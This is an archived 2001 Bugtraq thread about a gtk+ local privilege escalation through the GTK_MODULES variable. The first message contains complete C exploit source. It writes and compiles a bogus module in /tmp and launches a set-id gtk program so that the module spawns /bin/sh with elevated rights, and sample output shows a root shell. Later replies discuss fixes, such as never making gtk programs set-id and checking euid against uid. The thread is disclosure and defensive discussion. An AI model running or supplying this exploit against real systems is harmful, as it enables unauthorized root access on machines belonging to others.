5907881 2001-01-02 00:15 +0000 /156 rader/ Chris Sharp <v9@FAKEHALO.ORG>
Sänt av: joel@lysator.liu.se
Importerad: 2001-01-02 20:23 av Brevbäraren (som är implementerad i) Python
Extern mottagare: BUGTRAQ@SECURITYFOCUS.COM
Externa svar till: v9@FAKEHALO.ORG
Mottagare: Bugtraq (import) <14567>
Ärende: gtk+ security hole.
------------------------------------------------------------
From: Chris Sharp <v9@FAKEHALO.ORG>
To: BUGTRAQ@SECURITYFOCUS.COM
Message-ID: <20010102001535.14133.qmail@securityfocus.com>
while going through a quick audit of gtk i found:
gtk+ can be tricked into running arbitrary code
via a bogus module. this means any program using
gtk that is set*id can be exploited via this
method. here is an exploit i wrote for this
security hole:
original xgtk.c(working/un-wrapped):
http://realhalo.org/xgtk.c
xgtk.c:
/* (*)gtk+[v*] local module exploit, by
v9[v9@fakehalo.org]. this will give
you the euid/egid of a set*id program using
gtk+. this exploit works via
the GTK_MODULES environmental variable, by
tricking gtk to execute arbitrary
functions/commands with a bogus module. (using
gtk_module_init())
example(./xgtk):
-------------------------------------------------------------------------------
# ls -l /usr/bin/X11/gtk_program
-rwxr-sr-x 1 root tty 437625 Oct 23
1999 /usr/bin/X11/gtk_program
# cc xgtk.c -o xgtk
# ./xgtk /usr/bin/X11/gtk_program :0.0
[ (*)gtk+[v*] local module exploit, by
v9[v9@fakehalo.org]. ]
[ program: /usr/bin/X11/gtk_program(->/bin/sh),
display: :0.0. ]
[*] making module for gtk+ to execute.
(/tmp/gtkm.c)
[*] done, compiling module source file.
(/tmp/gtkm.c->/tmp/gtkm.so)
[*] done, checking to see if the module comiled.
(/tmp/gtkm.so)
[*] done, setting up the environment.
(module&display)
[*] done, executing /usr/bin/X11/gtk_program, the
module should load now.
[*] success, module loaded successfully.
[*] id stats: uid: 0, euid: 0, gid: 0, egid: 5.
[*] now executing: /bin/sh.
#
-------------------------------------------------------------------------------
note: this will require a valid display to
exploit successfully. also, i'm
unsure of this for other gtk versions, i
would just assume as much
that this applies to it.
*/
#define GCCPATH "/usr/bin/gcc" // path to gcc.
#define SRCFILE "/tmp/gtkm.c" // source to the
fake module to load.
#define MODEXEC "/tmp/gtkm.so" // fake module to
load.
#define DISPLAY ":0.0" // default
display. (also argv option)
#define EXECUTE "/bin/sh" // execute this
program.
#include <stdio.h>
#include <sys/stat.h>
int main(int argc,char **argv){
char cmd[256],syscmd[256],display[256];
struct stat mod1,mod2,mod3;
FILE *source;
fprintf(stderr,"[ (*)gtk+[v*] local module
exploit, by v9[v9@fakehalo.org]. ]"
"\n");
if(argc>1){strncpy(cmd,argv[1],sizeof(cmd));}
else{
fprintf(stderr,"[!] syntax: %s
</path/to/program> [display]\n",argv[0]);
exit(-1);
}
if(argc>2){strncpy(display,argv[2],sizeof(display));}
else{strncpy(display,DISPLAY,sizeof(display));}
if(stat(cmd,&mod1)){
fprintf(stderr,"[!] failed, %s doesn't seem to
exist. (path needed)\n",cmd);
exit(-1);
}
if(stat(GCCPATH,&mod2)){
fprintf(stderr,"[!] failed, %s compiler doesn't
seem to exist.\n",GCCPATH);
exit(-1);
}
fprintf(stderr,"[ program: %s(->%s), display: %s.
]\n\n",cmd,EXECUTE,display);
fprintf(stderr,"[*] making module for gtk+ to
execute. (%s)\n",SRCFILE);
unlink(SRCFILE);
unlink(MODEXEC);
source=fopen(SRCFILE,"w");
fprintf(source,"#include <stdio.h>\n");
fprintf(source,"void gtk_module_init(){\n");
fprintf(source," unlink(\"%s\");\n",SRCFILE);
fprintf(source," unlink(\"%s\");\n",MODEXEC);
fprintf(source," fprintf(stderr,\"[*] success,
module loaded successfully.\\n"
"\");\n");
fprintf(source," fprintf(stderr,\"[*] id stats:
uid: %%d, euid: %%d, gid: %%d"
", egid:
%%d.\\n\",getuid(),geteuid(),getgid(),getegid());\n",EXECUTE);
fprintf(source," fprintf(stderr,\"[*] now
executing: %s.\\n\");\n",EXECUTE);
fprintf(source,"
execl(\"%s\",\"%s\",0);\n",EXECUTE,EXECUTE);
fprintf(source,"}\n");
fclose(source);
fprintf(stderr,"[*] done, compiling module source
file. (%s->%s)\n",SRCFILE,
MODEXEC);
snprintf(syscmd,sizeof(syscmd),"%s -shared -o %s
%s 1>/dev/null 2>&1",GCCPATH,
MODEXEC,SRCFILE);
system(syscmd);
fprintf(stderr,"[*] done, checking to see if the
module comiled. (%s)\n",
MODEXEC);
if(stat(MODEXEC,&mod3)){
fprintf(stderr,"[!] failed, %s was not compiled
properly. (gcc failed)\n",
MODEXEC);
exit(-1);
}
fprintf(stderr,"[*] done, setting up the
environment. (module&display)\n");
setenv("GTK_MODULES",MODEXEC,1);
setenv("DISPLAY",display,1);
fprintf(stderr,"[*] done, executing %s, the
module should load now.\n",cmd);
if(execl(cmd,cmd,0)){
fprintf(stderr,"[!] failed, %s did not execute
properly.\n",cmd);
unlink(SRCFILE);
unlink(MODEXEC);
exit(-1);
}
}
Vade79 -> v9@fakehalo.org -> www.fakehalo.org.
(5907881) ------------------------------------------
5912110 2001-01-03 17:46 +0100 /30 rader/ Robert van der Meulen <rvdm@CISTRON.NL>
Sänt av: joel@lysator.liu.se
Importerad: 2001-01-03 22:21 av Brevbäraren (som är implementerad i) Python
Extern mottagare: BUGTRAQ@SECURITYFOCUS.COM
Externa svar till: rvdm@CISTRON.NL
Mottagare: Bugtraq (import) <14590>
Kommentar till text 5911335 av Kain <kain@CHAOSIUM.NET>
Ärende: Re: gtk+ security hole.
------------------------------------------------------------
Hi,
Quoting Kain (kain@CHAOSIUM.NET):
> On Tue, Jan 02, 2001 at 04:13:58PM -0500, Rob Mosher wrote:
> > A simple fix to this would be to drop priveleges before calling
> > gtk_init(), another easy fix is to modify gtk itself, to do this you
> > need to make the following modification of gtkmain.c. In gtk-1.2.8 its
> > at approximately line 215, you have:
> IMO, the best way to fix this would be to have libglib/gtk see if euid==0
> and just ignore those variables on init, and quite possibly go so far as
> to ignore "engine" lines in .gtkrcs or maybe filter them....
In the official reply of the gtk+ team, several, very valid, reasons
are given to _never_ have a suid/setgid gtk program. If a gtk
program is suid, the suidness is a security hole on itself. I do not
think gtk should be patched to behave differently when it's running
suid/setgid, as this will only encourage people to make suid/setgid
gtk programs, and we don't want that ;) If there's bugs in the gtk
libs they should (ofcourse) be patched, but specific 'features' for
evading problems occurring when running setuid/setgid should IMHO not
be implemented.
Just my $.02,
Robert
--
Linux Generation
Life is a sexually transmitted disease with 100% mortality.
(5912110) --------------------------------(Ombruten)
Bilaga (application/pgp-signature) i text 5912111
5912111 2001-01-03 17:46 +0100 /10 rader/ Robert van der Meulen <rvdm@CISTRON.NL>
Importerad: 2001-01-03 22:21 av Brevbäraren (som är implementerad i) Python
Extern mottagare: BUGTRAQ@SECURITYFOCUS.COM
Externa svar till: rvdm@CISTRON.NL
Mottagare: Bugtraq (import) <14591>
Bilaga (text/plain) till text 5912110
Ärende: Bilaga till: Re: gtk+ security hole.
------------------------------------------------------------
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.0.4 (GNU/Linux)
Comment: For info see http://www.gnupg.org
iD8DBQE6U1dfFLJHZigagQ4RAoL4AKC0HL/sZXuZZbZdE7IEwLDcdxMKvACg2BQE
/j+5+IDGEMXaUU3RAd8n8HQ=
=8P5j
-----END PGP SIGNATURE-----
(5912111) ------------------------------------------
5912227 2001-01-03 16:15 -0500 /18 rader/ Rob Mosher <rmosher@LIGHTNING.NET>
Sänt av: joel@lysator.liu.se
Importerad: 2001-01-03 23:14 av Brevbäraren (som är implementerad i) Python
Extern mottagare: BUGTRAQ@SECURITYFOCUS.COM
Externa svar till: rmosher@LIGHTNING.NET
Mottagare: Bugtraq (import) <14595>
Kommentar till text 5911374 av Rob Mosher <rmosher@LIGHTNING.NET>
Ärende: Re: gtk+ security hole.
------------------------------------------------------------
From: Rob Mosher <rmosher@LIGHTNING.NET>
To: BUGTRAQ@SECURITYFOCUS.COM
Message-ID: <3A53966D.6090307@lightning.net>
As pointed out by chris, GTK also accepts --gtk-module from the
command line, at around line 238 in gtk-1.2.8, you can make sure euid
== uid to prevent this from happenning. IE:
if ((strcmp ("--gtk-module", (*argv)[i]) == 0 ||
strncmp("--gtk-module=", (*argv)[i], 13) == 0) && geteuid() ==
getuid())
--
Rob Mosher
Lead Programmer / Systems Engineer
Lightning Internet Services, LLC
(5912227) --------------------------------(Ombruten)